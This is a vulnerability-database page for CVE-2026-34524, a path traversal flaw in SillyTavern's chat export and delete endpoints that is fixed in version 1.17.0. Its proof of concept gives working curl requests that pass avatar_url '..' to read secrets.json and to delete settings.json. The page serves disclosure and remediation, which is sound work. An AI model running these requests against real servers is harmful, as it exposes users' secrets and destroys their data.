CVE-2026-34524

HIGH
2026-04-01 https://github.com/SillyTavern/SillyTavern GHSA-vprr-q85p-79mf
8.3
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 01, 2026 - 22:16 vuln.today
CVE Published
Apr 01, 2026 - 21:41 nvd
HIGH 8.3

Tags

Path Traversal CSRF

Description

## Summary A Path Traversal vulnerability in chat endpoints allows an authenticated attacker to read and delete arbitrary files under their user data root (for example `secrets.json` and `settings.json`) by supplying `avatar_url=".."`. ### Details The input validator used by `avatar_url` blocks only `/` and NUL bytes, but does not block traversal segments like `..`. Evidence: - Weak validator regex (does not reject `..`): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/middleware/validateFileName.js#L24-L27> - Vulnerable delete path construction: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L575-L577> - Vulnerable export path construction: <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/endpoints/chats.js#L595-L598> - Endpoint auth context (authenticated user access): <https://github.com/SillyTavern/SillyTavern/blob/b7bb8be35a5c779b4db12a4a5b94d7e49096071c/src/server-main.js#L239> Because `avatar_url=".."` is accepted, `path.join(<user>/chats, "..")` resolves to `<user>/`, enabling direct access to files outside the chats directory. ### PoC Prerequisites: - Valid authenticated session cookie (`cookie.txt`) - Valid CSRF token (`$TOKEN`) Read sensitive file (`secrets.json`): ```bash curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \ -d '{"avatar_url":"..","is_group":false,"file":"secrets.json","format":"jsonl","exportfilename":"x"}' \ http://TARGET:8000/api/chats/export ``` Delete sensitive file (`settings.json`): ```bash curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \ -d '{"avatar_url":"..","chatfile":"settings.json"}' \ http://TARGET:8000/api/chats/delete ``` ### Impact - Confidentiality: exposed per-user secrets and config data. - Integrity/Availability: attacker can delete critical per-user files and break account operation. - Risk is significant in multi-user or remotely reachable deployments. ### Resolution The issue was addressed in version 1.17.0

Analysis

Path traversal in SillyTavern's chat API allows authenticated attackers to read and delete sensitive configuration files (secrets.json, settings.json) outside the intended chats directory by exploiting insufficient input validation on the avatar_url parameter. The vulnerability (CVSS 8.3) permits traversal using '..' segments due to a regex validator that only blocks '/' and NUL bytes. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Remediation

Within 24 hours: inventory all SillyTavern deployments and their current versions; identify instances exposed to authenticated users or the internet. Within 7 days: upgrade all SillyTavern instances to version 1.17.0 or later; validate upgrades in staging before production deployment. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

42
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +42
POC: 0

Share

CVE-2026-34524 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy